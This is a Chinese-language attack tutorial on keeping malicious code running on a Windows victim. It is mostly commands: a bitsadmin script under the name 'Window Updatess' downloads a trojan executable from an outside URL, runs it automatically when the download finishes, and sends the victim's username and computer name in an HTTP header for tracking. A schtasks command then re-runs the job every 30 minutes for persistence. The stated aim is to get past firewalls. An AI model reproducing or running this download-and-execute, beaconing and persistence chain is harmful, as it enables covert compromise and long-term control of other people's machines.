使用计划任务和bitsadmin实现恶意代码长期控守

使用计划任务和bitsadmin实现恶意代码长期控守

第一步：文件下载

由于我们想要不被计算器防火墙拦截的下载木马文件，所以考虑使用Windows自带的命令行工具。使用bitsadmin下载工具就可以做到这点。

这是写好保存的.ps1脚本

# 创建一个新的Job,命名为Window Updatess
bitsadmin /Create "Window Updatess"

# 指定一个下载任务和下载的地址
bitsadmin /AddFile "Window Updatess" http://ctf5.shiyanbar.com/423/re/rev2.exe d:\100w.exe

# 设置触发事件的条件
bitsadmin /SetNotifyFlags "Window Updatess" 1

# 设置作业完成数据传输或作业进入状态将运行的命令行程序
bitsadmin /SetNotifyCmdLine "Window Updatess" "%COMSPEC%" "cmd.exe /c bitsadmin.exe /complete \"Window Updatess\" && start /B d:\100w.exe"

# 设置下载任务出错时重传的延迟
bitsadmin /SetMinRetryDelay "Window Updatess" 120

# 添加自定义的HTTP头
bitsadmin /SetCustomHeaders "Window Updatess" "Caller:%USERNAME%@%COMPUTERNAME"

# 激活新的任务
bitsadmin /Resume "Window Updatess"

在PowerShell中执行



创建新的Job



最后激活Job



这样，我们就实现了第一步，就是利用Windows自带的命令行工具实现下载木马，并且不被防火墙拦截。

第二步：监控木马

当受害机器下载执行木马后，为了实现对木马的监控，可以使用服务器实现。由于这个下载本质是也是使用HTTP进行的一次GET请求，也就是说会发送HTTP请求头。我们在ps1脚本中设置了HTTP头：

## 添加自定义的HTTP头
bitsadmin /SetCustomHeaders "Window Updatess" "Caller:%USERNAME%@%COMPUTERNAME"

这样，就可以做到监控木马，第二步完成

第三步：建立计划任务形式的加载bitsadmin

使用schtasks命令建立计划任务来加载bitsadmin执行”Window Update“

给出具体命令（命令中有标注，具体执行时要去除）

schtasks /Create /TN "Window Update" /TR "%WINDIR%\system32\bitsadmin.exe /resume \"Windows Update\"" /sc minute /MO 30 /ED(此任务的最后一次运行时间) 2017/03/01 /ET 12:00(最后一次的运行时间) /Z(在任务运行完毕后删除任务) /IT(标志此任务只有在登录情况下才运行) /RU %USERNAME%(指定运行的用户账户)

执行结果